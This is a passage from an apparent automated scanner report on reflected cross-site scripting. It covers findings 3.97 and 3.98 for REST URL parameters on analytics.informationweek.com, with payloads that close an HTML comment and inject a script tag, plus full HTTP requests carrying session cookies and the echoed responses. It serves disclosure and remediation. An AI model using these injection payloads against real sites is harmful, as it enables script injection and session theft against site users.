3Cscript%3Ealert%281%29%3C%2Fscript%3E6ba192a2efa%2F20%2FNetwork-and-systems-management%2FNetwork-systems-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu9f503--><script>alert(1)</script>6ba192a2efa/20/Network-and-systems-management/Network-systems-management.html">
...[SNIP]...

3.97. http://analytics.informationweek.com/menu/20/Network-and-systems-management/Network-systems-management.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/20/Network-and-systems-management/Network-systems-management.html

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 2af97--><script>alert(1)</script>2b34991a0a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/202af97--><script>alert(1)</script>2b34991a0a3/Network-and-systems-management/Network-systems-management.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:15 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2b34991a0a3%2FNetwork-and-systems-management%2FNetwork-systems-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/202af97--><script>alert(1)</script>2b34991a0a3/Network-and-systems-management/Network-systems-management.html">
...[SNIP]...

3.98. http://analytics.informationweek.com/menu/20/Network-and-systems-management/Network-systems-management.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/20/Network-and-systems-management/Network-systems-management.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 49eb2--><script>alert(1)</script>3dbbea7fb8e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/20/Network-and-systems-management49eb2--><script>alert(1)</script>3dbbea7fb8e/Network-systems-manag